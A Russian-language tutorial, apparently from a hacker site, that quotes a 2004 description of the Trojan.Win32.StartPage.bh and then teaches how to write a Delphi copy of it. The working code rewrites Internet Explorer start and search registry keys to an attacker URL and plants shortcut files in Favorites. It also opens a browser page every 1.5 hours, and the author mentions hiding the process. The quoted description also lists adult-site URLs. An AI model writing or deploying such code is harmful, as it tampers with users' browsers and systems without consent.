| Салют! Сегодня мы с тобой напишем один очень простой вирус, который был реально кем-то создан. Я в принципе и за вирус его то не считаю, но все-таки.… Для практики. Для начала немного истории… Вот что появилось на сайте www.securitylab.ru 26 октября 2004 года… 26 октября 2004
Trojan.Win32.StartPage.bh
Троянская программа для Windows. Написана на языке Delphi. Файл программы имеет размер около 20КБ.
"Троянец" не пытается устанавливать себя в операционную систему или менять название своего файла, поэтому название процесса в памяти соответствует имени исполнительного файла самого "троянца".
Программа прописывает URL http://teen-biz.com/ в следующие ключи системного реестра:
[HKCU\Software\Microsoft\Internet Explorer\Main\Start Page]
[HKCU\Software\Microsoft\Internet Explorer\Main\Use Search Asst]
[HKCU\Software\Microsoft\Internet Explorer\Main\Search Page]
[HKCU\Software\Microsoft\Internet Explorer\Main\Search Bar]
[HKCU\Software\Microsoft\Internet Explorer\SearchURL]
[HKCU\Software\Microsoft\Internet Explorer\SearchURL\provide]
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Search\SearchAssistant]
Кроме того, программа создает в папке Favorites ("Избранное") следующие ссылки:
Quality Galleries 50 000 freepics and movie.url
http://www.terra.es/personal8/banners1/ WOW VIDEOS AND PICS -- REALLY HARDCORE VIDEOS.url
http://www.terra.es/personal8/banners2 Series Hardcore Pic Sets and Movies.url
http://fujit.drocherway.com/cgi-bin/r.cgi?from=2 Elite Teen Sites - Adult portal The Best TEEN SITES.url
http://eliteteensites.com/ Elite Mature Sites - Adult portal The Best Mature Sites.url
http://elitematuresites.com/ FULL COLLECTION DIRTY PORNO.url
http://teen-biz.com/ Young Teen Fucking Great Lo Archives.url
http://toteen.com/cgi-bin/tds/in.cgi?outgo
Примерно каждые 1,5 часа троянская программа открывает в браузере следующую страницу:
http://toteen.com/cgi-bin/tds/in.cgi?outgo Немного для вируса, правда? Правда может быть чего-нибудь будет после перехода по ссылке… Скрипт какой-то… Ну давай напишем…. Троянскую программу на языке дельфина.. :-D Создавай новый проект и удаляй его форму. Делается это так: Проект –> Удалить из проекта. Сохранись. Теперь смотрим исходник проекта (Проект –> Показать исходник). Ты увидишь вот что: program Project1; uses
Forms,
Unit1 in 'Unit1.pas' {Form1}; {$R *.res} begin
Application.Initialize;
Application.CreateForm(TForm1, Form1);
Application.Run;
end. Оставляй вот так: program Project1; uses
Windows, registry, ShellAPI; var begin END. Это будет наша основная форма. Теперь давай по порядку. Сначала шалим в реестре : Reg:=TRegistry.Create;
Reg.RootKey:=HKEY_Current_User; Reg.OpenKey('Software\Microsoft\Internet Explorer\Main',true);
Reg.WriteString('Start Page','http://hh-team.h14.ru/');
Reg.WriteString('Use Search Asst','http://hh-team.h14.ru/');
Reg.WriteString('Search Page','http://hh-team.h14.ru/');
Reg.WriteString('Search Bar','http://hh-team.h14.ru/');
Reg.CloseKey; Reg.OpenKey('Software\Microsoft\Internet Explorer',true);
Reg.WriteString('SearchURL','http://hh-team.h14.ru/');
Reg.CloseKey; Reg.OpenKey('Software\Microsoft\Internet Explorer\SearchURL',true);
Reg.WriteString('provide','http://hh-team.h14.ru/');
Reg.CloseKey; Reg.OpenKey('Software\Microsoft\Internet Explorer\Search',true);
Reg.WriteString('SearchAssistant','http://hh-team.h14.ru/');
Reg.CloseKey; Не забудь объявить переменную Reg в списке переменных: Var Reg:TRegistry; Разберем написанный выше код. Сначала мы создаем переменную реестра и указываем ей основной ключ. Далее по очереди открываем ключ, пишем переменную, закрываем ключ. Трудно, правда? =) Так-с… Вот! Добавляем ссылки в Избранное: Reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders',true); AssignFile(f, Reg.ReadString('Favorites') + '/VR-Online.url');
Rewrite(f);
Writeln(f,'[InternetShortcut]');
Writeln(f,'URL=http://www.vr-online.ru');
Close(f); AssignFile(f, Reg.ReadString('Favorites') + '/Лучший русский чат.url');
Rewrite(f);
Writeln(f,'[InternetShortcut]');
Writeln(f,'URL=http://8u.ru');
Close(f); AssignFile(f, Reg.ReadString('Favorites') + '/HH-Team.url');
Rewrite(f);
Writeln(f,'[InternetShortcut]');
Writeln(f,'URL=http://hh-team.h14.ru');
Close(f); Разбираем код: В первой строчке кода мы открываем ключ реестра, чтобы найти папку “Избранное” Далее создаем в ней несколько сайтов, правда там порнушки нет. Ну мы как-нибудь без этого… *) Ну вот и все… Ой! Извиняюсь! Забыл строчку с открытием страницы. Не просек как-то.. =( Для начала создадим процедуру открытия Инет-документа в целом: procedure OpenURL(Url: string);
var
ts: string;
begin
with TRegistry.Create do
try
rootkey := HKEY_CLASSES_ROOT;
OpenKey('\htmlfile\shell\open\command', False);
try
ts := ReadString('');
except
ts := '';
end;
CloseKey;
finally
Free;
end;
if ts = '' then Exit; ts := Copy(ts, Pos('"', ts) + 1, Length(ts));
ts := Copy(ts, 1, Pos('"', ts) - 1);
ShellExecute(0, 'open', PChar(ts), PChar(url), nil, SW_Maximize);
end; Описывать я ее не буду, неохота, нудно и долго.. *) Вставляем код: for i:=0 to 99 do
begin
sleep(5400000); // Это где-то 1.5 часа (в миллисекундах)
OpenUrl('about:blank');
end; Только открываться будет пустая страница, трафик жалко… *) Вот и весь вирус. Исходник прилагается. Да! Чуть не забыл! В Виде бонуса, мы еще скроем процесс. В общем смотри исходник… Теперь действительно все! Мы создали супер-мега-страшный вирус под названием “неудачный прикол” C Уважением, *****RockeR*****
Источник: http://www.vr-online.ru/ | 
